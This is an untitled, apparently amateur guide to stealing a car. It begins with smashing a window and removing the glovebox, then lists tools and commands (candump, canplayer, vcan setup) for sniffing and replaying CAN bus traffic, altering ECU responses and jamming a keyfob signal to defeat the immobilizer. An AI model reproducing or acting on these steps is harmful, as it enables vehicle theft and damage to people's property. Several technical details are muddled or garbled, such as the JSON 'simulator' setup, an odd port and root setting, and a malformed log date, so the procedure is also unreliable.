Untitled


	Required items:
	14mm Ratchet
	JTAGulator
	Bus Pirate Cable
	OBD to DE-9 Cable
	Micro USB Connector
	Funcube Dongle USB
	Laptop
	knife
	Something to enter the car

- Get into a car.
	(smash window or open the door.)

- Take out your 14mm ratchet to remove the bolts on each side of the glovebox before removing it with your knife.
	(Be careful not to damage any wiring!)

- Grab your laptop, log in and take out all the technology mentioned above.

- Connect your USB connector to the laptop and the JTAGulator to link them.
	The JTAG should turn green.

- Connect the Bus Pirate Cable to the ECU, it's behind the empty slot in which the glovebox was located.

- Hook the OBD to DE-9 cable to the CAN BUS and the laptop.
	Your computer should now be connected to the ECU.

- Open your VM on your laptop and run Kali Linux.

- Type "# ip link set can0 type can bitrate 500000 listen-only on".
	The Bitrate should now be 500000.

- Type "# ip link set can0 up" to start the network.

- Type "# candump -cae can0,0:0,#FFFFFFFF" to start sniffing.

- Set up a .json file with WWW as root and 2515 as port.

- Type "{"DeviceType": "simulator", "DeviceFile": "simulator.json"}".

- Type "$ candump -1 can0,0:0,#FFFFFFFF." to start using a candump to save the packets.

- Edit the ECU response by changing the 7F (failure) to 67 (acceptance).

- Take the Funcube Dongle you took out earlier and plug it in the laptop before letting it detect wave signals by the immobilizer.

- Feed data in the immobilizer, jamming the keyfob signal to keep the RFID the same so the immobilizer remains opened.

- Type "# modprobe vcan" "# ip link add vcan0 type vcan" "# ip link set vcan0 up" to start the virtual device up.
	The car now thinks there is a key in it.

- Type "$ canplayer vcan0=can0 < candump-2015-29-9_190602.log" to play the virtual device.
	The laptop now send data to the CAN BUS, the vehicle should turn on.